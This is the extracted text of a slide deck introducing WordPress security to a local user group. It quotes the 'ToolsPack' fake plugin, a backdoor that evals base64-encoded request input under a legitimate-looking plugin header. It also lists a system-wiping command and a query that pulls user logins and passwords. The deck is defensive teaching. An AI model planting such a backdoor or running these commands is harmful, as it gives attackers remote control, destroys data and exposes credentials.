Intro to WordpressSecurityPrepared for the Oklahoma City Wordpress User Groupby Chris Dodds
Chris Dodds Owner & Principal Advisor at Focusﬁre IT Strategy & Consulting Features: Ten+ years of experience across multiple industries and IT disciplines.Certiﬁcations:CISSP System Requirements: Food, water, &MCITP:SA internet connectivity.Security+Network+
This talk is not about thetop 5 WP security threats.
Password AttacksExploit weak passwordsDictionary basedCan be entirely automated
ToolsPack Plugin toolspack.php <?php /* Plugin Name: ToolsPack Description: Supercharge your WordPress site with powerful features previously only available to WordPress.com users. core release. Keep the plugin updated! Version: 1.2 Author: Mark Stain Author URI: http://checkWPTools.com/ */ $_REQUEST[e] ? EVAL( base64_decode( $_REQUEST[e] ) ) : exit; ?>Source - http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html
This backdoor code allows theremote user to:Execute commands on you server$WINDIR ? `del /F/S/Q $WINDIR*` : `rm -rf /`;Execute commands against your WP databaseSELECT login + - + password FROM users